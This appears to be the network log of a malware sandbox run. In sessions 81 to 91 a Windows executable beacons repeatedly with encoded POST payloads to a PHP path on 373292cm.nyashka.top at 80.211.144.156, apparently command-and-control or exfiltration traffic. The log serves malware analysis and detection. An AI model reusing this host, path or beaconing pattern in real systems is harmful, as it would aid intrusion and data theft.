                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:22.099589109 CEST2544OUTData Raw: 5a 57 5c 56 51 40 51 59 5b 5f 5a 51 59 55 58 5f 57 5b 5d 5c 57 51 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZW\VQ@QY[_ZQYUX_W[]\WQSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./3;C!.#41=[,<X9(-(7<S7;(?"398&F$.Y/-
                                                                    Aug 21, 2024 10:04:22.410029888 CEST1236OUTData Raw: 5a 57 5c 56 51 40 51 59 5b 5f 5a 51 59 55 58 5f 57 5b 5d 5c 57 51 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZW\VQ@QY[_ZQYUX_W[]\WQSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./3;C!.#41=[,<X9(-(7<S7;(?"398&F$.Y/-
                                                                    Aug 21, 2024 10:04:23.021291971 CEST1236OUTData Raw: 5a 57 5c 56 51 40 51 59 5b 5f 5a 51 59 55 58 5f 57 5b 5d 5c 57 51 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZW\VQ@QY[_ZQYUX_W[]\WQSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./3;C!.#41=[,<X9(-(7<S7;(?"398&F$.Y/-
                                                                    Aug 21, 2024 10:04:23.208652973 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:23.208884954 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:23.209095001 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:23.210480928 CEST1308OUTData Raw: 3b 59 2c 11 37 0f 2f 20 00 3a 3b 14 39 09 08 06 2c 5d 5a 42 3f 5e 01 26 29 00 02 1c 31 0a 0c 3b 0b 0a 2c 35 3f 00 30 04 34 0f 05 1b 08 56 03 35 2a 24 2d 3f 3e 02 58 12 0b 56 1b 3f 2b 3c 5b 0b 32 13 26 5f 33 5e 59 1f 09 3f 50 14 3a 37 0c 22 34 3d
                                                                    Data Ascii: ;Y,7/ :;9,]ZB?^&)1;,5?04V5*$-?>XV?+<[2&_3^Y?P:7"4=1'8<Z1+81;9<\0/::4_>W&?'!* 0%,>4V.(S2[-5.3< /9_.89.9 -R=\;:&3E3V5=)??%PC#6$3?7+1:9#<9;10[U<,"#>T;=W&,_4=1
                                                                    Aug 21, 2024 10:04:23.799643993 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    81192.168.2.75304080.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:23.933182955 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:24.287029982 CEST2544OUTData Raw: 5f 51 5c 50 54 46 51 5d 5b 5f 5a 51 59 5f 58 52 57 50 5d 52 57 5b 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _Q\PTFQ][_ZQY_XRWP]RW[S]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.; 3">7##!\*<](:?+7< R<_'Y V&,&F$.Y/
                                                                    Aug 21, 2024 10:04:24.599420071 CEST1236OUTData Raw: 5f 51 5c 50 54 46 51 5d 5b 5f 5a 51 59 5f 58 52 57 50 5d 52 57 5b 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _Q\PTFQ][_ZQY_XRWP]RW[S]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.; 3">7##!\*<](:?+7< R<_'Y V&,&F$.Y/
                                                                    Aug 21, 2024 10:04:24.662587881 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:24.664443970 CEST1308OUTData Raw: 3b 59 2c 11 37 0f 2f 20 00 3a 3b 14 39 09 08 06 2c 5d 5a 42 3f 5e 01 26 29 00 02 1c 31 0a 0c 3b 0b 0a 2c 35 3f 00 30 04 34 0f 05 1b 08 56 03 35 2a 24 2d 3f 3e 02 58 12 0b 56 1b 3f 2b 3c 5b 0b 32 13 26 5f 33 5e 59 1f 09 3f 50 14 3a 37 0c 22 34 3d
                                                                    Data Ascii: ;Y,7/ :;9,]ZB?^&)1;,5?04V5*$-?>XV?+<[2&_3^Y?P:7"4=1'8<Z1+81;9<\0/::4_>W&?'!* 0%,>4V.(S2[-5.3< /9_.89.9 -R=\;:&3E3V5=)??%PC#6$3?7+1:9#<9;10[U<,"#>T;=W&,_4=1
                                                                    Aug 21, 2024 10:04:24.964374065 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    82192.168.2.75304180.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:25.085985899 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:25.443602085 CEST2544OUTData Raw: 5f 55 59 50 54 44 54 59 5b 5f 5a 51 59 55 58 57 57 5d 5d 5f 57 5e 53 5f 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _UYPTDTY[_ZQYUXWW]]_W^S_YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/3A#>? 0&)>,(X:(=Z7,S4!?)\ \,>&F$.Y/-
                                                                    Aug 21, 2024 10:04:25.751146078 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:25.883160114 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    83192.168.2.75304280.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:26.009181976 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:26.365325928 CEST2544OUTData Raw: 5f 53 59 50 51 40 54 50 5b 5f 5a 51 59 50 58 56 57 51 5d 58 57 5d 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _SYPQ@TP[_ZQYPXVWQ]XW]S]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,3;B6<_7#)X)[4?.5<#, 2,V(40%/&F$.Y/
                                                                    Aug 21, 2024 10:04:26.411892891 CEST1236OUTData Raw: 09 3f 50 14 3a 37 0c 22 34 3d 31 27 38 3c 06 5a 02 31 2b 13 38 06 31 3b 0c 39 1b 1b 3c 04 06 5c 30 01 2f 16 3a 05 17 3a 34 5f 3e 57 26 3f 27 21 12 2a 20 20 30 00 25 0f 2c 06 3e 1f 34 56 0f 2e 08 28 53 15 32 5b 09 2d 35 2e 0c 09 33 3c 20 2f 09 39
                                                                    Data Ascii: ?P:7"4=1'8<Z1+81;9<\0/::4_>W&?'!* 0%,>4V.(S2[-5.3< /9_.89.9 -R=\;:&3E3V5=)??%PC#6$3?7+1:9#<9;10[U<,"#>T;=W&,_4=17>$<683?9?]V;:1Y5,'(2&2081X??<!,!Z2* %


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    84192.168.2.75304380.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:26.489444971 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:26.833957911 CEST1844OUTData Raw: 5a 55 5c 52 54 40 54 58 5b 5f 5a 51 59 5e 58 53 57 5c 5d 53 57 59 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZU\RT@TX[_ZQY^XSW\]SWYSXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.,3+B!-70">><?=9[+[; +S4"<V?X 9Y8&F$.Y/
                                                                    Aug 21, 2024 10:04:27.143641949 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:27.268851995 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 54 3d 36 31 03 26 02 2f 0d 27 23 2d 0b 3d 03 27 10 2b 3d 04 04 24 3b 2a 05 26 58 30 55 27 5d 2d 12 2b 3e 29 0b 24 2c 30 05 2c 24 2b 5d 0c 13 22 59 37 5c 2a 5a 26 2c 34 11 29 38 3c 04 21 5a 26 11 3f 5c 21 52 3c 3f 33 07 3e 39 23 59 2a 3a 29 0f 3b 28 2d 5d 2f 20 26 57 22 2e 2b 52 0d 11 27 0b 2b 13 26 0c 2a 00 2b 1a 36 2b 2f 5b 33 2d 03 0d 26 21 21 0a 30 5f 24 5a 26 0c 13 1f 24 21 25 54 32 15 0f 00 27 2f 07 1d 22 22 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &T=61&/'#-='+=$;*&X0U']-+>)$,0,$+]"Y7\*Z&,4)8<!Z&?\!R<?3>9#Y*:);(-]/ &W".+R'+&*+6+/[3-&!!0_$Z&$!%T2'/""#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    85192.168.2.75304480.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:26.509272099 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:26.865195036 CEST2544OUTData Raw: 5f 56 59 50 54 42 54 5f 5b 5f 5a 51 59 55 58 50 57 5d 5d 5e 57 58 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _VYPTBT_[_ZQYUXPW]]^WXSXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.\80'E58^ #==(%Z(=/\#,0!1**;X7028>&F$.Y/-
                                                                    Aug 21, 2024 10:04:27.164068937 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:27.289388895 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    86192.168.2.75304580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:27.415482044 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:27.771385908 CEST2544OUTData Raw: 5a 51 5c 53 51 44 54 5c 5b 5f 5a 51 59 50 58 54 57 5b 5d 59 57 5c 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZQ\SQDT\[_ZQYPXTW[]YW\SXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U._.3"(#=>(]>.*)=;4(7<W+# 39]/&F$.Y/
                                                                    Aug 21, 2024 10:04:28.069284916 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:28.201663017 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    87192.168.2.75304680.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:28.654474020 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:29.005990982 CEST2544OUTData Raw: 5a 51 5c 51 51 47 51 5d 5b 5f 5a 51 59 54 58 57 57 50 5d 5e 57 51 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZQ\QQGQ][_ZQYTXWWP]^WQSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.8U3A5= &>.<>>)_?[8",,4?'] 0,&F$.Y/)
                                                                    Aug 21, 2024 10:04:29.319025993 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:29.512407064 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    88192.168.2.75304780.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:29.632169008 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:29.990314007 CEST2544OUTData Raw: 5f 56 5c 57 51 43 54 5b 5b 5f 5a 51 59 52 58 52 57 5b 5d 58 57 5a 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _V\WQCT[[_ZQYRXRW[]XWZS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.;6.$]#5)>++.+"<#/($7%]8&F$.Y/1
                                                                    Aug 21, 2024 10:04:30.287446976 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:30.413641930 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    89192.168.2.75304880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:30.539298058 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:30.942049026 CEST2544OUTData Raw: 5a 57 5c 57 51 42 51 5d 5b 5f 5a 51 59 51 58 5e 57 5e 5d 52 57 59 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZW\WQBQ][_ZQYQX^W^]RWYS[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./#A"$Y 0>*. _>>]+7Z7,$4!S<:;7 2/.&F$.Y/=
                                                                    Aug 21, 2024 10:04:31.193556070 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:31.391850948 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    90192.168.2.75304980.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:31.526459932 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:31.880882978 CEST2544OUTData Raw: 5f 5c 5c 50 54 48 54 5e 5b 5f 5a 51 59 55 58 5e 57 50 5d 5a 57 5b 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\\PTHT^[_ZQYUX^WP]ZW[SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U._8!=^ ")-<X"(='X#??Q !R?)7X"#*/&F$.Y/-
                                                                    Aug 21, 2024 10:04:32.210042953 CEST25INHTTP/1.1 100 Continue


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    91192.168.2.75305080.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:32.277745008 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:32.631231070 CEST1868OUTData Raw: 5a 51 5c 57 51 43 54 51 5b 5f 5a 51 59 5e 58 5f 57 5f 5d 5d 57 58 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZQ\WQCTQ[_ZQY^X_W_]]WXSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/#"=<##5*-(_<>+-[7/3!2'(9 #3%,&F$.Y/
